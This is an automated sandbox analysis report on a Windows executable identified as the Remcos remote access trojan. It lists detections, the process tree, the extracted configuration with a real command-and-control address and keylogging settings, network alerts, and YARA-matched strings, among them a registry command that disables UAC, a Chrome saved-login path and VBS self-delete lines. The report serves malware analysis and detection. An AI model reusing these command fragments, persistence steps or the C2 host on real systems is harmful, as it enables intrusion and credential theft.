Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jv4ri.exe

Overview

General Information

Sample name:jv4ri.exe
Analysis ID:1505824
MD5:b17e1003bb9bbe58e090c7752447c016
SHA1:a159b486e535469d4c49b227d27608f2ad48288e
SHA256:d24d76d03365122aa5a4a7828a2d14368066da840ae8945cf595a6b17ceca700
Tags:exeremcosrat
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jv4ri.exe (PID: 5832 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
    • name.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
      • svchost.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • name.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
        • svchost.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • WerFault.exe (PID: 4956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 6604 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 4160 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
      • svchost.exe (PID: 6548 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "5.95.169.104:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-S3AD48", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 49 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.svchost.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              12.2.svchost.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                12.2.svchost.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  12.2.svchost.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  12.2.svchost.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 55 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6604, ProcessName: wscript.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\jv4ri.exe", CommandLine: "C:\Users\user\Desktop\jv4ri.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6176, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ProcessId: 4208, ProcessName: svchost.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6604, ProcessName: wscript.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\jv4ri.exe", CommandLine: "C:\Users\user\Desktop\jv4ri.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6176, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ProcessId: 4208, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 6176, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3712, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T21:56:59.201852+020020365941Malware Command and Control Activity Detected192.168.2.54970445.95.169.1042404TCP
                  2024-09-06T21:57:23.529980+020020365941Malware Command and Control Activity Detected192.168.2.54972145.95.169.1042404TCP
                  2024-09-06T21:57:23.529980+020020365941Malware Command and Control Activity Detected192.168.2.54972245.95.169.1042404TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "5.95.169.104:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-S3AD48", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 42%
                  Multi AV Scanner detection for submitted file
                  Source: jv4ri.exeReversingLabs: Detection: 42%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: jv4ri.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_004338C8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
                  Source: name.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ef034609-8

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407538 _wcslen,CoGetObject,5_2_00407538
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
                  Source: jv4ri.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD4696
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDC9C7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC93C FindFirstFileW,FindClose,0_2_00CDC93C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF200
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF35D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDF65E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3A2B
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3D4E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDBF27
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00084696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00084696
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C93C FindFirstFileW,FindClose,2_2_0008C93C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C9C7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F200
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F35D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F65E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083A2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083D4E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BF27
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
